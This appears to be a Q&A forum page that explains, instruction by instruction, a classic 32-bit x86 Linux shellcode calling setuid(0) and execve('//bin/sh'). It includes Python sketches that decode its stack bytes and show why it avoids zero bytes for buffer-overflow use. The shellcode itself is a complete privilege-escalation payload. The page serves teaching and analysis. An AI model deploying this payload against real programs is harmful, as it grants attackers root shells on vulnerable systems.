How can I explain the behavior of the following shellcode exploit?

This is shellcode that exploits a buffer overflow vulnerability. It calls setuid(0) and then spawns a shell using execve(). Below is how I have interpreted it:

xor    %ebx,%ebx       ; Xoring to make ebx value 0
lea    0x17(%ebx),%eax ; adds 23 to 0 and loads effective addr to eax. for setuid()
int    $0x80           ; interrupt
push   %ebx            ; push ebx
push   $0x68732f6e     ; push address // why this address only????
push   $0x69622f2f     ; push address // same question
mov    %esp,%ebx
push   %eax
push   %ebx
mov    %esp,%ecx
cltd                   ; mov execve sys call into al
mov    $0xb,%al
int    $0x80           ; interrupt

Can anyone explain each step clearly?

294

asked Nov 08 '10 18:11

Vinod K

1 Answer

int is the instruction for triggering a software interrupt. Software interrupts are numbered (from 0 to 255) and handled by the kernel. On 32-bit x86 Linux systems, interrupt 128 (0x80) is the conventional entry point for system calls. The kernel expects the system call arguments in registers; in particular, the %eax register holds the number that identifies which system call is being requested.

1. Set %ebx to 0.
2. Compute %ebx+23 and store the result in %eax (the opcode is lea, as in "load effective address", but no memory access is involved; this is just a devious way of making an addition).
3. System call. %eax contains 23, which means that the system call is setuid. That system call uses one argument (the target UID), to be found in %ebx, which conveniently contains 0 at that point (it was set in the first instruction). Note: upon return, registers are unmodified, except for %eax, which contains the return value of the system call, normally 0 (if the call was a success).
4. Push %ebx on the stack (it is still 0).
5. Push $0x68732f6e on the stack.
6. Push $0x69622f2f on the stack. Since the stack grows "down" and since x86 processors use little-endian encoding, the effect of instructions 4 to 6 is that %esp (the stack pointer) now points at a sequence of twelve bytes, of values 2f 2f 62 69 6e 2f 73 68 00 00 00 00 (in hexadecimal). That's the encoding of the "//bin/sh" string (with a terminating zero, and three extra zeros afterwards). The pushed values are therefore not addresses; they are the characters of the string, four at a time.
7. Move %esp to %ebx. Now %ebx contains a pointer to the "//bin/sh" string which was built above.
8. Push %eax on the stack (%eax is 0 at that point, assuming setuid succeeded; it is the returned status from setuid).
9. Push %ebx on the stack (pointer to "//bin/sh"). Instructions 8 and 9 build on the stack an array of two pointers, the first being the pointer to "//bin/sh" and the second a NULL pointer. That array is what the execve system call will use as its second argument.
10. Move %esp to %ecx. Now %ecx points to the array built with instructions 8 and 9.
11. Sign-extend %eax into %edx:%eax. cltd is the AT&T syntax for what the Intel documentation calls cdq. Since %eax is zero at that point, this sets %edx to zero too.
12. Set %al (the least significant byte of %eax) to 11. Since %eax was zero, the whole value of %eax is now 11.
13. System call. The value of %eax (11) identifies the system call as execve. execve expects three arguments, in %ebx (pointer to a string naming the file to execute), %ecx (pointer to an array of pointers to strings, which are the program arguments, the first one being a copy of the program name, to be used by the invoked program itself) and %edx (pointer to an array of pointers to strings, which are the environment variables; Linux tolerates a NULL value there, meaning an empty environment), respectively.
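The byte layout described for instructions 4 to 6 can be checked with a few lines of Python. This is only a sketch of the arithmetic, not part of the exploit: it packs the three pushed values as little-endian 32-bit words and lays them out from the lowest address upward, which is the order in which %esp sees them. The variable names are illustrative.

```python
import struct

# Values pushed by instructions 4, 5 and 6, in program order.
pushes = [0x00000000, 0x68732F6E, 0x69622F2F]

# Each push moves %esp down by 4, so the LAST push sits at the LOWEST address.
# Reading memory upward from %esp therefore visits the pushes in reverse order.
stack_bytes = b"".join(struct.pack("<I", value) for value in reversed(pushes))

# The C string seen through %ebx ends at the first zero byte.
path = stack_bytes.split(b"\x00")[0].decode("ascii")

print(stack_bytes.hex(" "))  # 2f 2f 62 69 6e 2f 73 68 00 00 00 00
print(path)                  # //bin/sh
```

The doubled slash pads the path to exactly eight characters, so it fits in two 32-bit pushes without any filler byte; the kernel treats "//bin/sh" the same as "/bin/sh".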

So the code first calls setuid(0), then calls execve("//bin/sh", x, 0) where x points to an array of two pointers, first one being a pointer to "//bin/sh", while the other is NULL.
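To see how the registers and the stack evolve, the thirteen instructions can be traced on a toy model. The sketch below is not a real emulator and executes nothing: `trace_shellcode`, the starting register values and the starting stack address are all made up for illustration, and it assumes that setuid returns 0. It only records what each `int $0x80` would ask the kernel to do.

```python
import struct

MASK = 0xFFFFFFFF
SYSCALL_NAMES = {23: "setuid", 11: "execve"}  # numbers taken from the explanation


def trace_shellcode():
    """Model the 13 instructions and return the system calls they request."""
    # Arbitrary junk in the registers, arbitrary stack address (assumptions).
    regs = {"eax": 0xDEADBEEF, "ebx": 0xDEADBEEF, "ecx": 0xDEADBEEF,
            "edx": 0xDEADBEEF, "esp": 0xBFFFF000}
    mem = {}       # address -> byte value
    syscalls = []

    def push(value):
        regs["esp"] = (regs["esp"] - 4) & MASK
        for offset, byte in enumerate(struct.pack("<I", value & MASK)):
            mem[regs["esp"] + offset] = byte

    def read_u32(addr):
        return struct.unpack("<I", bytes(mem[addr + i] for i in range(4)))[0]

    def read_cstr(addr):
        chars = bytearray()
        while mem[addr] != 0:
            chars.append(mem[addr])
            addr += 1
        return chars.decode("ascii")

    regs["ebx"] ^= regs["ebx"]                         # 1.  xor  %ebx,%ebx
    regs["eax"] = (regs["ebx"] + 0x17) & MASK          # 2.  lea  0x17(%ebx),%eax
    syscalls.append((SYSCALL_NAMES[regs["eax"]],       # 3.  int  $0x80
                     regs["eax"], regs["ebx"]))
    regs["eax"] = 0                                    #     assumed: setuid succeeded
    push(regs["ebx"])                                  # 4.  push %ebx
    push(0x68732F6E)                                   # 5.  push $0x68732f6e
    push(0x69622F2F)                                   # 6.  push $0x69622f2f
    regs["ebx"] = regs["esp"]                          # 7.  mov  %esp,%ebx
    push(regs["eax"])                                  # 8.  push %eax
    push(regs["ebx"])                                  # 9.  push %ebx
    regs["ecx"] = regs["esp"]                          # 10. mov  %esp,%ecx
    regs["edx"] = MASK if regs["eax"] & 0x80000000 else 0   # 11. cltd
    regs["eax"] = (regs["eax"] & 0xFFFFFF00) | 0x0B    # 12. mov  $0xb,%al

    # 13. int $0x80: decode the arguments the kernel would read.
    path = read_cstr(regs["ebx"])
    argv = []
    pointer = regs["ecx"]
    while read_u32(pointer) != 0:
        argv.append(read_cstr(read_u32(pointer)))
        pointer += 4
    syscalls.append((SYSCALL_NAMES[regs["eax"]], regs["eax"],
                     path, argv, regs["edx"]))
    return syscalls


for call in trace_shellcode():
    print(call)
```

Under those assumptions the trace reports setuid with argument 0, followed by execve with the path "//bin/sh", an argument array holding that single string, and a NULL environment pointer.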

This code is quite convoluted because it wants to avoid zeros: when assembled into binary opcodes, the sequence of instructions uses only non-zero bytes. For instance, if the 12th instruction had been movl $0xb,%eax (setting the whole of %eax to 11), then the binary representation of that instruction would have contained three bytes of value 0. The absence of zero bytes makes the sequence usable as the contents of a zero-terminated C string, which string-copying functions would otherwise cut short at the first zero. This is meant for attacking buggy programs through buffer overflows, of course.
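The zero-byte claim can be checked against the machine code. The hex encodings below are what a 32-bit x86 assembler is expected to produce for each instruction; they are written out by hand here, so treat them as an assumption and confirm them with a disassembler such as objdump before relying on them.

```python
# (AT&T instruction, expected 32-bit encoding in hex)
INSTRUCTIONS = [
    ("xor    %ebx,%ebx",       "31 db"),
    ("lea    0x17(%ebx),%eax", "8d 43 17"),
    ("int    $0x80",           "cd 80"),
    ("push   %ebx",            "53"),
    ("push   $0x68732f6e",     "68 6e 2f 73 68"),
    ("push   $0x69622f2f",     "68 2f 2f 62 69"),
    ("mov    %esp,%ebx",       "89 e3"),
    ("push   %eax",            "50"),
    ("push   %ebx",            "53"),
    ("mov    %esp,%ecx",       "89 e1"),
    ("cltd",                   "99"),
    ("mov    $0xb,%al",        "b0 0b"),
    ("int    $0x80",           "cd 80"),
]

shellcode = b"".join(bytes.fromhex(encoding) for _, encoding in INSTRUCTIONS)

# The straightforward alternative for instruction 12: movl $0xb,%eax
mov_eax_full = bytes.fromhex("b8 0b 00 00 00")

print(len(shellcode), "bytes,", shellcode.count(0), "zero bytes")
print("movl $0xb,%eax contains", mov_eax_full.count(0), "zero bytes")

# A C string ends at the first zero byte, so this is what would survive a copy.
survives_copy = shellcode.split(b"\x00")[0]
print(survives_copy == shellcode)
```

The 32-bit immediate in movl $0xb,%eax is what drags in the three zero bytes; writing only %al needs an 8-bit immediate, which is why the code first makes sure the rest of %eax is already zero.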

116

answered Sep 28 '22 16:09

Thomas Pornin

Tags: x86, assembly, buffer-overflow, exploit, shellcode
